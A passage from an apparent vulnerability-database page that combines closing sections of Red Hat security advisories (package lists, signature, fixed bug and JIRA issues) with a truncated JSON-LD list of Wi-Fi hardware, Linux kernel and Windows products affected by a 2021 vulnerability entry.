aarch64: bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST FrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l bobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy SfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW HgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC DRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E lJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD Jhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK dQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8 zf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v 1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN +PuV5cms0sE=2UUA -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert FluentdNodeDown always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding

6

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202105-1431",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "catalyst 9115axe",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "windows server 2016",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catalyst 9105axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr42e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows rt 8.1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "c-120",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1842",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1815",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1607"
      },
      {
        "model": "scalance w1748-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "scalance wam766-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "catalyst 9115axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "mac80211",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "meraki mr72",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w1788-2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "aironet 1800i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9124",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 55",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 70 single",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1909"
      },
      {
        "model": "killer wi-fi 6e ax1675",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.235"
      },
      {
        "model": "meraki mr53e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex dx80",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w774-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1809"
      },
      {
        "model": "scalance w786-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "windows 7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catalyst 9117",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9120",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr74",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9120axp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w788-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "1109-2p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr34",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr62",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w738-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "webex room 55",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wi-fi 6 ax201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "c-230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "scalance w786-2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "windows server 2016",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "2004"
      },
      {
        "model": "meraki mr45",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-110",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "catalyst 9117 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr66",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx67cw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx67w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w1750d",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "meraki mr26",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ac 9560",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ir829gw-lte-ga-ek9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9130axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1810",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w778-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "scalance w788-2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "ir829-2lte-ea-bk9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr56",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "meraki mr52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-235",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "ir829gw-lte-ga-ck9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9115",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "w-118",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1532",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9105axw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9115 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829gw-lte-na-ak9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.271"
      },
      {
        "model": "webex room kit mini",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex dx70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829gw-lte-vz-ak9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows 8.1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "webex room 55 dual",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "o-90",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "c-130",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "w-68",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1542d",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1832",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "20h2"
      },
      {
        "model": "c-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "proset ac 9560",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "c-75",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "meraki mr46e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1810w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance wam766-1 6ghz",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "meraki mx65w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 8260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "catalyst 9130axe",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wi-fi 6e ax210",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ip phone 8861",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1852",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ac 8260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "2004"
      },
      {
        "model": "catalyst 9120axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829-2lte-ea-ak9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki gr10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr12",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr76",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 8265",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "webex room 70 dual g2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w734-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "ac 8265",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "scalance w1788-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "aironet iw3702",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance wam763-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "windows server 2012",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catalyst 9120axe",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "802.11",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ieee",
        "version": "*"
      },
      {
        "model": "catalyst 9130 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 3165",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4"
      },
      {
        "model": "webex room 70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server 2019",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.0"
      },
      {
        "model": "scalance wum763-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "scalance w761-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "meraki mx68w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ip phone 8865",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9130",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9120 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1100-8p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829gw-lte-ga-zk9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ip phone 8832",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr53",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.124"
      },
      {
        "model": "c-200",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1815i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr33",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 55s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w721-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "meraki mx68cw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wireless 7265 \\",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "proset ac 9260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "scalance w748-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "meraki z3c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "ir829gw-lte-ga-sk9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr86",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9105",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.9"
      },
      {
        "model": "proset ac 3168",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "meraki mr20",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki z3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wi-fi 6 ax200",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.0"
      },
      {
        "model": "catalyst 9117axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.271"
      },
      {
        "model": "ip phone 6861",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ac 9260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "o-105",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "catalyst 9124axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 70 single g2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr84",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki gr60",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 70s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "killer wi-fi 6 ax1650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "meraki mr32",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ip phone 8821",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance w786-2ia",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "wi-fi 6 ax201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "catalyst 9124axd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-65",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "meraki mr55",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 9462",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.42"
      },
      {
        "model": "meraki mr30h",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "wi-fi 6 ax200",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "scalance wum766-1 6ghz",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "ir829-2lte-ea-ek9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "killer ac 1550",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "proset ac 9461",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.193"
      },
      {
        "model": "scalance w1788-2ia",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "1100-4p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr42",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 85s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr46",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "scalance wum766-1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": null
      },
      {
        "model": "c-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "meraki mr44",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx64w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr36",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows 10",
        "scope": "eq",
